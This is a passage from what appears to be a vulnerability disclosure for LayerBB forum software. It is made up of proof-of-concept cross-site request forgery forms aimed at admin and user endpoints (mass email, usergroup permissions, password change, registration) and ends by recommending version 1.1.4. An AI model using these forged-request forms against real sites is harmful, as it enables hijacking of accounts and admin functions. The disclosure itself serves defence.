style="min-height:250px;"></textarea> <div class="alert alert-info" role="alert"><b>Please Note:</b> HTML Tags do not work, line breaks and urls are automatically converted!</div> <br> <label for="custom_logo">Easy Logo Changer</label> <input type="file" name="custom_logo" id="custom_logo" class="form-control"> </div><br> <center><input type="submit" name="update" class="btn btn-default" value="Save Settings"></center><br> </div> </div></section> </form> <!-- System Settings CSRF End --> <!-- Manage Category CSRF --> <table class="table table-hover"> <thead> <tr> <th style="width:70%">Category</th> <th style="width:10%">Order</th> <th style="width:20%">Controls</th> </tr> </thead> <tbody> <tr> <td> <strong>test cat</strong><br> <small>test cat</small> </td> <td> <form action="http://localhost/admin/manage_category.php" method="POST"> <input type="hidden" name="cat_id" value="2"> <input type="text" class="form-control" name="cat_place" value="1"> <input type="submit" name="change_place" style="display:none;"> </form> </td> <td> <div class="btn-group"> <li><a href="http://localhost/admin/edit_category.php/id/2">Edit Category</a></li> <li><a href="http://localhost/admin/manage_category.php/delete_category/2">Delete Category</a></li> </div> </td> </tr><tr> <td> <strong>First Category</strong><br> <small>First category on this forum!</small> </td> <td> <form action="http://localhost/admin/manage_category.php" method="POST"> <input type="hidden" name="cat_id" value="1"> <input type="text" class="form-control" name="cat_place" value="2"> <input type="submit" name="change_place" style="display:none;"> </form> </td> <td> <div class="btn-group"> <li><a href="http://localhost/admin/edit_category.php/id/1">Edit Category</a></li> <li><a href="http://localhost/admin/manage_category.php/delete_category/1">Delete Category</a></li> </div> </td> </tr> </tbody> </table> <center><h3>Use <font color="red">ENTER</font> to save catagory order</h3></center> <!-- Manage Category CSRF End --> <!-- Manage Node CSRF --> <table class="table table-hover"> <thead> <tr> <th style="width:70%">Node</th> <th style="width:10%">Order</th> <th style="width:20%">Controls</th> </tr> </thead> <tbody> <tr> <td> <strong><a href="#" target="_blank">First Node</a></strong><br> <small>The first node on this forum</small><br> <small>Sub-Forums: </small> </td> <td> <form action="http://localhost/admin/manage_node.php" method="POST"> <input type="hidden" name="node_id" value="1"> <input type="text" class="form-control" name="node_place" value="0"> <input type="submit" name="change_place" style="display:none;"> </form> </td> <td> <div class="btn-group"> <li><a href="http://localhost/admin/edit_node.php/id/1">Edit Node</a></li> <li><a href="http://localhost/admin/manage_node.php/delete_node/1">Delete Node</a></li> <li><a href="http://localhost/admin/manage_node.php/toggle_lock/1">Toggle Lock</a></li> </div> </td> </tr> </tbody> </table> <center><h3>Use <font color="red">ENTER</font> to save catagory order</h3></center> <!-- Manage Node CSRF End --> <!-- Mass Mail CSRF --> <form action="http://localhost/admin/massemail.php" method="POST" style="padding: 25px;"> <label for="subject">Subject</label> <input type="text" name="subject" id="subject" value="" class="form-control"> <label for="content">Email Content</label> <textarea id="editor" name="content" class="form-control" style="min-height:250px;"></textarea><br> <div class="alert alert-info" role="alert"><b>Please Note:</b> HTML Tags do not work, line breaks and urls are automatically converted!</div> <input type="submit" name="send" value="Send Email" class="btn btn-default"> </form> <!-- Mass Mail CSRF End --> <!-- Navbar CSRF --> <form method="POST" action="http://localhost/admin/navbar.php"> <h4 class="modal-title" id="myModalLabel">Editing <b>google</b> Navbar Item</h4> <input type="hidden" name="id" value="1"> <div class="form-group"> <label for="title">URL Title</label> <input type="text" class="form-control" id="title" name="title" value="google"> </div> <div class="form-group"> <label for="url">URL</label> <input type="text" class="form-control" id="url" name="url" value="https://google.com"> </div> <div class="form-group"> <label for="newpage">Open URL in new page</label> <select class="form-control" id="newpage" name="newpage"> <option value="1">Current - Do Not Change</option> <option value="1">Yes</option> <option value="0">No</option> </select> </div> <div class="form-group"> <label for="order">Order</label> <input type="text" class="form-control" id="order" name="order" value="1"> </div> <button type="submit" name="savechange" id="savechange" class="btn btn-primary">Save Changes</button> </form> <!-- Navbar CSRF End --> <!-- New Category CSRF --> <form action="http://localhost/admin/new_category.php" method="POST" style="padding: 25px;"> <label for="cat_title">Title</label> <input type="text" name="cat_title" id="cat_title" class="form-control"> <label for="cat_desc">Description</label> <textarea name="cat_desc" id="cat_desc" class="form-control"></textarea> <br> <label for="allowed_usergroups">Allowed Usergroups</label> <br> <input type="checkbox" name="allowed_ug[]" value="1" checked=""> User<br><input type="checkbox" name="allowed_ug[]" value="2" checked=""> Banned<br><input type="checkbox" name="allowed_ug[]" value="3" checked=""> Moderator<br><input type="checkbox" name="allowed_ug[]" value="4" checked=""> Administrator<br> <br> <input type="submit" name="create" value="Create Category" class="btn btn-default"> </form> <!-- New Category CSRF End --> <!-- New Node CSRF --> <form action="http://localhost/admin/new_node.php" method="POST" style="padding: 25px;"> <label for="node_title">Title</label> <input type="text" name="node_title" id="node_title" class="form-control"> <label for="node_desc">Description</label> <textarea name="node_desc" id="node_desc" class="form-control"></textarea> <label for="parent">Parent</label><br> <select name="node_parent" id="parent"> <option value="1">First Category</option><option value="&1">&nbsp;&nbsp;&nbsp;&nbsp;-First Node</option> </select> <br> <label for="additional_option">Additional Options</label><br> <input type="checkbox" name="lock_node" value="1" id="lock_node"> <label style="font-weight: normal;" for="lock_node">Lock Node</label> <br> <label for="allowed_usergroups">Allowed Usergroups</label> <br> <input type="checkbox" name="allowed_ug[]" value="1" checked=""> User<br><input type="checkbox" name="allowed_ug[]" value="2" checked=""> Banned<br><input type="checkbox" name="allowed_ug[]" value="3" checked=""> Moderator<br><input type="checkbox" name="allowed_ug[]" value="4" checked=""> Administrator<br> <label for="labels">Labels</label> <small>Each Line is a new label. HTML enabled.</small> <textarea name="labels" id="labels" class="form-control"></textarea><br> <input type="submit" name="create" value="Create Node" class="btn btn-default"> </form> <!-- New Node CSRF End --> <!-- New Usergroup CSRF End --> <form action="http://localhost/admin/new_usergroup.php" method="POST" style="padding: 25px;"> <label for="g_name">Name</label> <input type="text" name="g_name" id="g_name" class="form-control"> <label for="g_style">Style <small><code>%username%</code> will be replaced with the user's username.</small></label> <textarea name="g_style" id="g_style" class="form-control"><span>%username%</span></textarea> <label for="permissions">Permissions</label><br> <input type="checkbox" name="permissions[]" value="1"> view_forum<br><input type="checkbox" name="permissions[]" value="2"> create_thread<br><input type="checkbox" name="permissions[]" value="3"> reply_thread<br><input type="checkbox" name="permissions[]" value="4"> access_moderation<br><input type="checkbox" name="permissions[]" value="5"> access_administration<br> <br> <input type="checkbox" name="is_staff" value="1"> This Usergroup is staff. <br> <input type="submit" name="new" value="Create Usergroup" class="btn btn-default"> </form> <!-- New Usergroup CSRF End --> <!-- Profile Fields CSRF --> <form method="POST" action="http://localhost/admin/profile_fields.php" style="padding: 25px;"> <input type="hidden" name="id" value="1"> <div class="form-group"> <label for="title">Title</label> <input type="text" class="form-control" id="title" name="title" value="discord"> </div> <button type="submit" name="savechange" id="savechange" class="btn btn-primary">Save Changes</button> </form> <!-- Profile Fields CSRF End --> <!-- Sidebar CSRF --> <form method="POST" action="http://localhost/admin/sidebar.php" style="padding: 25px;"> <input type="hidden" name="id" value="1"> <div class="form-group"> <label for="title">Title</label> <input type="text" class="form-control" id="title" name="title" value="Demo Information"> </div> <div class="form-group"> <label for="content">Content</label> <textarea class="form-control" name="content" id="content" style="min-height:250px;"><div class="alert alert-danger" role="alert"> This is the LayerBB Demo Website, you can login using<br /><br /> User: Administrator <br />Pass: admin (Case sensitive)<br /><br />This demo gets refreshed every 24-hours.</div></textarea> </div> <div class="form-group"> <label for="style">Style</label> <select class="form-control" id="style" name="style"> <option value="danger">Current - Do Not Change</option> <option value="primary">Primary</option> <option value="success">Success</option> <option value="info">Info</option> <option value="warning">Warning</option> <option value="danger">Danger</option></select> </div> <div class="form-group"> <label for="glyphicon">Glyphicon (Optional)</label> <input type="text" class="form-control" id="glyphicon" name="glyphicon" value="alert"> </div> <div class="form-group"> <label for="order">Order</label> <input type="text" class="form-control" id="order" name="order" value="1"> </div> <button type="submit" name="savechange" id="savechange" class="btn btn-primary">Save Changes</button> </form> <!-- Sidebar CSRF End --> <!-- Edit Threads/Posts CSRF --> <form id="LAYER_form" action="http://localhost/edit.php/post/1" method="POST" style="padding: 25px;"> <input id="title" name="title" type="text" value="test"><br> <textarea id="editor" name="content" style="width: 100%; height: 300px; max-width: 100%; min-width: 100%;">test post</textarea> <br> <input type="submit" name="edit" value="Edit Post"> </form> <!-- Edit Threads/Posts CSRF --> <!-- New Threads/Posts CSRF --> <form id="LAYER_form" action="http://localhost/new.php/node/1" method="POST" style="padding: 25px;"> <input type="text" name="title" placeholder="Thread Title..." style="width:100%;" class="col-sm-9 form-control"> <div class="clearfix"></div> <br> <textarea id="editor" style="width: 100%; height: 300px; max-width: 100%;" name="content"></textarea> <div class="center-block" style="margin-top:5px;"> <input type="submit" name="create" value="Create Thread"> </div> <br> <ul class="nav nav-tabs"> <li class="active"><a href="#polls" data-toggle="tab">Polls</a></li> </ul> <div class="tab-content"> <div class="tab-pane active" id="polls"> <div class="col-md-6"> <label for="question">Question</label> <input type="text" name="question"> <label for="answer_1">1. Answer</label> <input type="text" name="answer_1" id="answer_1"> <label for="answer_2">2. Answer</label> <input type="text" name="answer_2" id="answer_2"> <span class="btn btn-primary btn-xs" href="" onclick="plus();"> Add an answer field </span> </div> </div> </div> </form> <!-- New Threads/Posts CSRF End --> <!-- Thread Reply CSRF --> <form id="LAYER_form" action="http://localhost/reply.php/test.1" method="POST" style="padding: 25px;"> <textarea id="editor" style="width: 100%; height: 300px;" name="content"></textarea> <p class="pull-right" style="margin-top:5px;"> <input type="submit" name="reply" value="Post Reply"> </p> </form> <!-- Thread Reply CSRF End --> <!-- PM Reply CSRF --> <form id="%form_id%" action="http://localhost/conversations.php/cmd/reply/id/1" method="POST" style="padding: 25px;"> <textarea id="editor" style="width: 100%; height: 300px;" name="content"></textarea> <p class="pull-right" style="margin-top:5px;"> <input type="submit" name="reply" value="Post Reply"> </p> </form> <!-- PM Reply CSRF End --> <!-- Report Post CSRF --> <form action="http://localhost/report.php/post/1" id="LAYER_form" method="POST" style="padding: 25px;"> <label for="reason">Reason</label> <textarea name="reason" style="height:150px;width:100%;min-width:100%;max-width:100%;"></textarea> <br> <input type="submit" name="report" value="Report"> </form> <!-- Report Post CSRF End --> <!-- Edit Profile CSRF --> <form id="LAYER_form" action="http://localhost/profile.php/cmd/edit" method="POST" style="padding: 25px;"> <label for="email">Email</label> <input type="text" name="email" id="email" value="[email protected]"> <label for="usermsg">User Message</label> <input type="text" name="usermsg" id="usermsg" value="User"> <label for="gender">Gender</label> <select id="gender" name="gender"><option value="0" selected="selected">Not telling</option> <option value="1">Female</option> <option value="2">Male</option></select> <label for="timezone">Timezone</label> <select id="timezone" name="timezone"><option value="Pacific/Midway">(UTC-11:00) Midway Island</option><option value="Pacific/Samoa">(UTC-11:00) Samoa</option><option value="Pacific/Honolulu">(UTC-10:00) Hawaii</option><option value="US/Alaska">(UTC-09:00) Alaska</option><option value="America/Los_Angeles">(UTC-08:00) Pacific Time (US & Canada)</option><option value="America/Tijuana">(UTC-08:00) Tijuana</option><option value="US/Arizona">(UTC-07:00) Arizona</option><option value="America/Chihuahua">(UTC-07:00) Chihuahua</option><option value="America/Chihuahua">(UTC-07:00) La Paz</option><option value="America/Mazatlan">(UTC-07:00) Mazatlan</option><option value="US/Mountain">(UTC-07:00) Mountain Time (US & Canada)</option><option value="America/Managua">(UTC-06:00) Central America</option><option value="US/Central" selected="selected">(UTC-06:00) Central Time (US & Canada)</option><option value="America/Mexico_City">(UTC-06:00) Guadalajara</option><option value="America/Mexico_City">(UTC-06:00) Mexico City</option><option value="America/Monterrey">(UTC-06:00) Monterrey</option><option value="Canada/Saskatchewan">(UTC-06:00) Saskatchewan</option><option value="America/Bogota">(UTC-05:00) Bogota</option><option value="US/Eastern">(UTC-05:00) Eastern Time (US & Canada)</option><option value="US/East-Indiana">(UTC-05:00) Indiana (East)</option><option value="America/Lima">(UTC-05:00) Lima</option><option value="America/Bogota">(UTC-05:00) Quito</option><option value="Canada/Atlantic">(UTC-04:00) Atlantic Time (Canada)</option><option value="America/Caracas">(UTC-04:30) Caracas</option><option value="America/La_Paz">(UTC-04:00) La Paz</option><option value="America/Santiago">(UTC-04:00) Santiago</option><option value="Canada/Newfoundland">(UTC-03:30) Newfoundland</option><option value="America/Sao_Paulo">(UTC-03:00) Brasilia</option><option value="America/Argentina/Buenos_Aires">(UTC-03:00) Buenos Aires</option><option value="America/Argentina/Buenos_Aires">(UTC-03:00) Georgetown</option><option value="America/Godthab">(UTC-03:00) Greenland</option><option value="America/Noronha">(UTC-02:00) Mid-Atlantic</option><option value="Atlantic/Azores">(UTC-01:00) Azores</option><option value="Atlantic/Cape_Verde">(UTC-01:00) Cape Verde Is.</option><option value="Africa/Casablanca">(UTC+00:00) Casablanca</option><option value="Europe/London">(UTC+00:00) Edinburgh</option><option value="Etc/Greenwich">(UTC+00:00) Greenwich Mean Time : Dublin</option><option value="Europe/Lisbon">(UTC+00:00) Lisbon</option><option value="Europe/London">(UTC+00:00) London</option><option value="Africa/Monrovia">(UTC+00:00) Monrovia</option><option value="UTC">(UTC+00:00) UTC</option><option value="Europe/Amsterdam">(UTC+01:00) Amsterdam</option><option value="Europe/Belgrade">(UTC+01:00) Belgrade</option><option value="Europe/Berlin">(UTC+01:00) Berlin</option><option value="Europe/Berlin">(UTC+01:00) Bern</option><option value="Europe/Bratislava">(UTC+01:00) Bratislava</option><option value="Europe/Brussels">(UTC+01:00) Brussels</option><option value="Europe/Budapest">(UTC+01:00) Budapest</option><option value="Europe/Copenhagen">(UTC+01:00) Copenhagen</option><option value="Europe/Ljubljana">(UTC+01:00) Ljubljana</option><option value="Europe/Madrid">(UTC+01:00) Madrid</option><option value="Europe/Paris">(UTC+01:00) Paris</option><option value="Europe/Prague">(UTC+01:00) Prague</option><option value="Europe/Rome">(UTC+01:00) Rome</option><option value="Europe/Sarajevo">(UTC+01:00) Sarajevo</option><option value="Europe/Skopje">(UTC+01:00) Skopje</option><option value="Europe/Stockholm">(UTC+01:00) Stockholm</option><option value="Europe/Vienna">(UTC+01:00) Vienna</option><option value="Europe/Warsaw">(UTC+01:00) Warsaw</option><option value="Africa/Lagos">(UTC+01:00) West Central Africa</option><option value="Europe/Zagreb">(UTC+01:00) Zagreb</option><option value="Europe/Athens">(UTC+02:00) Athens</option><option value="Europe/Bucharest">(UTC+02:00) Bucharest</option><option value="Africa/Cairo">(UTC+02:00) Cairo</option><option value="Africa/Harare">(UTC+02:00) Harare</option><option value="Europe/Helsinki">(UTC+02:00) Helsinki</option><option value="Europe/Istanbul">(UTC+02:00) Istanbul</option><option value="Asia/Jerusalem">(UTC+02:00) Jerusalem</option><option value="Europe/Helsinki">(UTC+02:00) Kyiv</option><option value="Africa/Johannesburg">(UTC+02:00) Pretoria</option><option value="Europe/Riga">(UTC+02:00) Riga</option><option value="Europe/Sofia">(UTC+02:00) Sofia</option><option value="Europe/Tallinn">(UTC+02:00) Tallinn</option><option value="Europe/Vilnius">(UTC+02:00) Vilnius</option><option value="Asia/Baghdad">(UTC+03:00) Baghdad</option><option value="Asia/Kuwait">(UTC+03:00) Kuwait</option><option value="Europe/Minsk">(UTC+03:00) Minsk</option><option value="Africa/Nairobi">(UTC+03:00) Nairobi</option><option value="Asia/Riyadh">(UTC+03:00) Riyadh</option><option value="Europe/Volgograd">(UTC+03:00) Volgograd</option><option value="Asia/Tehran">(UTC+03:30) Tehran</option><option value="Asia/Muscat">(UTC+04:00) Abu Dhabi</option><option value="Asia/Baku">(UTC+04:00) Baku</option><option value="Europe/Moscow">(UTC+04:00) Moscow</option><option value="Asia/Muscat">(UTC+04:00) Muscat</option><option value="Europe/Moscow">(UTC+04:00) St. Petersburg</option><option value="Asia/Tbilisi">(UTC+04:00) Tbilisi</option><option value="Asia/Yerevan">(UTC+04:00) Yerevan</option><option value="Asia/Kabul">(UTC+04:30) Kabul</option><option value="Asia/Karachi">(UTC+05:00) Islamabad</option><option value="Asia/Karachi">(UTC+05:00) Karachi</option><option value="Asia/Tashkent">(UTC+05:00) Tashkent</option><option value="Asia/Calcutta">(UTC+05:30) Chennai</option><option value="Asia/Kolkata">(UTC+05:30) Kolkata</option><option value="Asia/Calcutta">(UTC+05:30) Mumbai</option><option value="Asia/Calcutta">(UTC+05:30) New Delhi</option><option value="Asia/Calcutta">(UTC+05:30) Sri Jayawardenepura</option><option value="Asia/Katmandu">(UTC+05:45) Kathmandu</option><option value="Asia/Almaty">(UTC+06:00) Almaty</option><option value="Asia/Dhaka">(UTC+06:00) Astana</option><option value="Asia/Dhaka">(UTC+06:00) Dhaka</option><option value="Asia/Yekaterinburg">(UTC+06:00) Ekaterinburg</option><option value="Asia/Rangoon">(UTC+06:30) Rangoon</option><option value="Asia/Bangkok">(UTC+07:00) Bangkok</option><option value="Asia/Bangkok">(UTC+07:00) Hanoi</option><option value="Asia/Jakarta">(UTC+07:00) Jakarta</option><option value="Asia/Novosibirsk">(UTC+07:00) Novosibirsk</option><option value="Asia/Hong_Kong">(UTC+08:00) Beijing</option><option value="Asia/Chongqing">(UTC+08:00) Chongqing</option><option value="Asia/Hong_Kong">(UTC+08:00) Hong Kong</option><option value="Asia/Krasnoyarsk">(UTC+08:00) Krasnoyarsk</option><option value="Asia/Kuala_Lumpur">(UTC+08:00) Kuala Lumpur</option><option value="Australia/Perth">(UTC+08:00) Perth</option><option value="Asia/Singapore">(UTC+08:00) Singapore</option><option value="Asia/Taipei">(UTC+08:00) Taipei</option><option value="Asia/Ulan_Bator">(UTC+08:00) Ulaan Bataar</option><option value="Asia/Urumqi">(UTC+08:00) Urumqi</option><option value="Asia/Irkutsk">(UTC+09:00) Irkutsk</option><option value="Asia/Tokyo">(UTC+09:00) Osaka</option><option value="Asia/Tokyo">(UTC+09:00) Sapporo</option><option value="Asia/Seoul">(UTC+09:00) Seoul</option><option value="Asia/Tokyo">(UTC+09:00) Tokyo</option><option value="Australia/Adelaide">(UTC+09:30) Adelaide</option><option value="Australia/Darwin">(UTC+09:30) Darwin</option><option value="Australia/Brisbane">(UTC+10:00) Brisbane</option><option value="Australia/Canberra">(UTC+10:00) Canberra</option><option value="Pacific/Guam">(UTC+10:00) Guam</option><option value="Australia/Hobart">(UTC+10:00) Hobart</option><option value="Australia/Melbourne">(UTC+10:00) Melbourne</option><option value="Pacific/Port_Moresby">(UTC+10:00) Port Moresby</option><option value="Australia/Sydney">(UTC+10:00) Sydney</option><option value="Asia/Yakutsk">(UTC+10:00) Yakutsk</option><option value="Asia/Vladivostok">(UTC+11:00) Vladivostok</option><option value="Pacific/Auckland">(UTC+12:00) Auckland</option><option value="Pacific/Fiji">(UTC+12:00) Fiji</option><option value="Pacific/Kwajalein">(UTC+12:00) International Date Line West</option><option value="Asia/Kamchatka">(UTC+12:00) Kamchatka</option><option value="Asia/Magadan">(UTC+12:00) Magadan</option><option value="Pacific/Fiji">(UTC+12:00) Marshall Is.</option><option value="Asia/Magadan">(UTC+12:00) New Caledonia</option><option value="Asia/Magadan">(UTC+12:00) Solomon Is.</option><option value="Pacific/Auckland">(UTC+12:00) Wellington</option><option value="Pacific/Tongatapu">(UTC+13:00) Nuku'alofa</option></select> <br> <label for="location">Location</label> <select id="location" name="location"><option value="--" selected="selected">Nothing selected</option><option value="AD">Andorra</option><option value="AE">United Arab Emirates</option><option value="AF">Afghanistan</option><option value="AG">Antigua and Barbuda</option><option value="AI">Anguilla</option><option value="AL">Albania</option><option value="AM">Armenia</option><option value="AO">Angola</option><option value="AQ">Antarctica</option><option value="AR">Argentina</option><option value="AS">American Samoa</option><option value="AT">Austria</option><option value="AU">Australia</option><option value="AW">Aruba</option><option value="AX">Aland Islands</option><option value="AZ">Azerbaijan</option><option value="BA">Bosnia and Herzegovina</option><option value="BB">Barbados</option><option value="BD">Bangladesh</option><option value="BE">Belgium</option><option value="BF">Burkina Faso</option><option value="BG">Bulgaria</option><option value="BH">Bahrain</option><option value="BI">Burundi</option><option value="BJ">Benin</option><option value="BL">Saint Barthélemy</option><option value="BM">Bermuda</option><option value="BN">Brunei Darussalam</option><option value="BO">Bolivia</option><option value="BQ">Bonaire</option><option value="BR">Brazil</option><option value="BS">Bahamas</option><option value="BT">Bhutan</option><option value="BV">Bouvet Island</option><option value="BW">Botswana</option><option value="BY">Belarus</option><option value="BZ">Belize</option><option value="CA">Canada</option><option value="CC">Cocos Islands</option><option value="CD">Congo (the Democratic Republic)</option><option value="CF">Central African Republic</option><option value="CG">Congo</option><option value="CH">Switzerland</option><option value="CI">Cote d'Ivoire</option><option value="CK">Cook Islands</option><option value="CL">Chile</option><option value="CM">Cameroon</option><option value="CN">China</option><option value="CO">Colombia</option><option value="CR">Costa Rica</option><option value="CU">Cuba</option><option value="CV">Cabo Verde</option><option value="CW">Curacao</option><option value="CX">Christmas Island</option><option value="CY">Cyprus</option><option value="CZ">Czech Republic</option><option value="DE">Germany</option><option value="DJ">Djibouti</option><option value="DK">Denmark</option><option value="DM">Dominica</option><option value="DO">Dominican Republic</option><option value="DZ">Algeria</option><option value="EC">Ecuador</option><option value="EE">Estonia</option><option value="EG">Egypt</option><option value="EH">Western Sahara</option><option value="ER">Eritrea</option><option value="ES">Spain</option><option value="ET">Ethiopia</option><option value="FI">Finland</option><option value="FJ">Fiji</option><option value="FK">Falkland Islands</option><option value="FM">Micronesia</option><option value="FO">Faroe Islands</option><option value="FR">France</option><option value="GA">Gabon</option><option value="GB">United Kingdom</option><option value="GD">Grenada</option><option value="GE">Georgia</option><option value="GF">French Guiana</option><option value="GG">Guernsey</option><option value="GH">Ghana</option><option value="GI">Gibraltar</option><option value="GL">Greenland</option><option value="GM">Gambia</option><option value="GN">Guinea</option><option value="GP">Guadeloupe</option><option value="GQ">Equatorial Guinea</option><option value="GR">Greece</option><option value="GS">South Georgia and the South Sandwich Islands</option><option value="GT">Guatemala</option><option value="GU">Guam</option><option value="GW">Guinea-Bissau</option><option value="GY">Guyana</option><option value="HK">Hong Kong</option><option value="HM">Heard Island and McDonald Islands</option><option value="HN">Honduras</option><option value="HR">Croatia</option><option value="HT">Haiti</option><option value="HU">Hungary</option><option value="ID">Indonesia</option><option value="IE">Ireland</option><option value="IL">Israel</option><option value="IM">Isle of Man</option><option value="IN">India</option><option value="IO">British Indian Ocean Territory</option><option value="IQ">Iraq</option><option value="IR">Iran</option><option value="IS">Iceland</option><option value="IT">Italy</option><option value="JE">Jersey</option><option value="JM">Jamaica</option><option value="JO">Jordan</option><option value="JP">Japan</option><option value="KE">Kenya</option><option value="KG">Kyrgyzstan</option><option value="KH">Cambodia</option><option value="KI">Kiribati</option><option value="KM">Comoros</option><option value="KN">Saint Kitts and Nevis</option><option value="KP">The Democratic People's Republic of Korea</option><option value="KR">The Republic of Korea</option><option value="KW">Kuwait</option><option value="KY">Cayman Islands</option><option value="KZ">Kazakhstan</option><option value="LA">Lao People's Democratic Republic</option><option value="LB">Lebanon</option><option value="LC">Saint Lucia</option><option value="LI">Liechtenstein</option><option value="LK">Sri Lanka</option><option value="LR">Liberia</option><option value="LS">Lesotho</option><option value="LT">Lithuania</option><option value="LU">Luxembourg</option><option value="LV">Latvia</option><option value="LY">Libya</option><option value="MA">Morocco</option><option value="MC">Monaco</option><option value="MD">Moldova</option><option value="ME">Montenegro</option><option value="MF">Saint Martin</option><option value="MG">Madagascar</option><option value="MH">Marshall Islands</option><option value="MK">Macedonia</option><option value="ML">Mali</option><option value="MM">Myanmar</option><option value="MN">Mongolia</option><option value="MO">Macao</option><option value="MP">Northern Mariana Islands</option><option value="MQ">Martinique</option><option value="MR">Mauritania</option><option value="MS">Montserrat</option><option value="MT">Malta</option><option value="MU">Mauritius</option><option value="MV">Maldives</option><option value="MW">Malawi</option><option value="MX">Mexico</option><option value="MY">Malaysia</option><option value="MZ">Mozambique</option><option value="NA">Namibia</option><option value="NC">New Caledonia</option><option value="NE">Niger</option><option value="NF">Norfolk Islands</option><option value="NG">Nigeria</option><option value="NI">Nicaragua</option><option value="NL">Netherlands</option><option value="NO">Norway</option><option value="NP">Nepal</option><option value="NR">Nauru</option><option value="NU">Niue</option><option value="NZ">New Zealand</option><option value="OM">Oman</option><option value="PA">Panama</option><option value="PE">Peru</option><option value="PF">French Polynesia</option><option value="PG">Papua New Guinea</option><option value="PH">Philippines</option><option value="PK">Pakistan</option><option value="PL">Poland</option><option value="PM">Saint Pierre and Miquelon</option><option value="PN">Pitcairn</option><option value="PR">Puerto Rico</option><option value="PS">Palestine</option><option value="PT">Portugal</option><option value="PW">Palau</option><option value="PY">Paraguay</option><option value="QA">Qatar</option><option value="RE">Réunion</option><option value="RO">Romania</option><option value="RS">Serbia</option><option value="RU">Russian Federation</option><option value="RW">Rwanda</option><option value="SA">Saudi Arabia</option><option value="SB">Solomon Islands</option><option value="SC">Seychelles</option><option value="SD">Sudan</option><option value="SE">Sweden</option><option value="SG">Singapore</option><option value="SH">Saint Helena</option><option value="SI">Slovenia</option><option value="SJ">Svalbard and Jan Mayen</option><option value="SK">Slovakia</option><option value="SL">Sierra Leone</option><option value="SM">San Marino</option><option value="SN">Senegal</option><option value="SO">Somalia</option><option value="SR">Suriname</option><option value="SS">South Sudan</option><option value="ST">Sao Tome and Pricipe</option><option value="SV">El Salvador</option><option value="SX">Sint Maarten</option><option value="SY">Syrian Arab Republic</option><option value="SZ">Swaziland</option><option value="TC">Turks and Caicos Islands</option><option value="TD">Chad</option><option value="TF">French Southern Terrotories</option><option value="TG">Togo</option><option value="TH">Thailand</option><option value="TJ">Tajikistan</option><option value="TK">Tokelau</option><option value="TL">Timor-Leste</option><option value="TM">Turkmenistan</option><option value="TN">Tunisia</option><option value="TO">Tonga</option><option value="TR">Turkey</option><option value="TT">Trinidad and Tobago</option><option value="TV">Tuvalu</option><option value="TW">Taiwan</option><option value="TZ">Tanzania</option><option value="UA">Ukraine</option><option value="UG">Uganda</option><option value="UM">United States Minor Outlying Islands</option><option value="US">United States</option><option value="UY">Uruguay</option><option value="UZ">Uzbekistan</option><option value="VA">Holy See</option><option value="VC">Venezuela</option><option value="VG">Virgin Islands (GB)</option><option value="VI">Virgin Islands (US)</option><option value="VN">Viet Nam</option><option value="VU">Vanatu</option><option value="WF">Wallis and Futuna</option><option value="WS">Samoa</option><option value="YE">Yemen</option><option value="YT">Mayotte</option><option value="ZA">South Africa</option><option value="ZM">Zambia</option><option value="ZW">Zimbabwe</option></select> <br> <label for="birthday">Birthday</label> <input type="text" name="birthday" id="birthday" value="0000-00-00"> <span id="helpBlock" class="help-block">In the format of: YYYY-MM-DD</span> <label for="editor">About You</label><br> <textarea name="about" id="editor" style="min-width: 100%; max-width: 100%; height: 150px;"></textarea> <br> <div class="panel panel-default"> <div class="panel-heading">Additional Profile Fields</div> <div class="panel-body"></div> </div> <br> <input type="submit" name="edit" value="Save Changes"> </form> <!-- Edit Profile CSRF End --> <!-- Edit Signature CSRF --> <form id="LAYER_form" action="http://localhost/profile.php/cmd/signature" method="POST" style="padding: 25px;"> <label for="sig">Signature</label> <textarea name="sig" id="editor" style="width: 100%; height: 300px; max-width: 100%; min-width: 100%;"></textarea> <br><br> <input type="submit" name="edit" value="Save Changes"> </form> <!-- Edit Signature CSRF End --> <!-- Change Password CSRF --> <form id="LAYER_form" action="http://localhost/profile.php/cmd/password" method="POST" style="padding: 35px;"> <label for="current_password">Current Password</label> <input type="password" name="current_password" id="current_password"> <label for="new_password">New Password</label> <input type="password" name="new_password" id="new_password"> <br><br> <input type="submit" name="edit" value="Save Changes"> </form> <!-- Change Password CSRF End --> <!-- Forgot Password CSRF --> <form action="http://localhost/members.php/cmd/forgotpassword" method="POST" id="LAYER_form" style="padding: 25px;"> <label for="email">Email</label> <input type="text" name="email" id="email" class="form-control"> <br><br> <input type="submit" name="forget" value="Send Email" class="btn btn-default"> </form> <!-- Forgot Password CSRF End --> <!-- Reset Password CSRF --> <form action="http://localhost/members.php/cmd/resetpassword" method="POST" id="LAYER_form" style="padding: 25px;"> <label for="password">Password</label> <input type="password" name="password" id="password" class="form-control"> <label for="a_password">Confirm Password</label> <input type="password" name="a_password" id="a_password" class="form-control"> <br><br> <input type="submit" name="reset" value="Reset Password" class="btn btn-default"> </form> <!-- Reset Password CSRF End --> <!-- Register Account CSRF --> <form action="http://localhost/members.php/cmd/register" method="POST" style="padding: 25px;"> <label for="username">Username</label> <input type="text" name="username" value="" id="username" class="form-control"> <label for="password">Password</label> <input type="password" name="password" id="password" class="form-control"> <label for="a_password">Confirm Password</label> <input type="password" name="a_password" id="a_password" class="form-control"> <label for="email">Email</label> <input type="text" name="email" value="" id="email" class="form-control"> <label for="LayerBB_captcha">Are you a bot?</label><br> <img src="http://localhost/public/img/captcha.php" alt="LayerBB Captcha"><br><input type="text" id="LayerBB_captcha" name="LayerBB_captcha"> <br><br> <input type="submit" name="register" value="Register" class="btn btn-default"> By clicking "Register", you agree to abide by the forum rules located <a href="http://localhost/members.php/cmd/rules">here</a>. </form> <!-- Register Account CSRF End --> 3. Solution: Update to 1.1.4

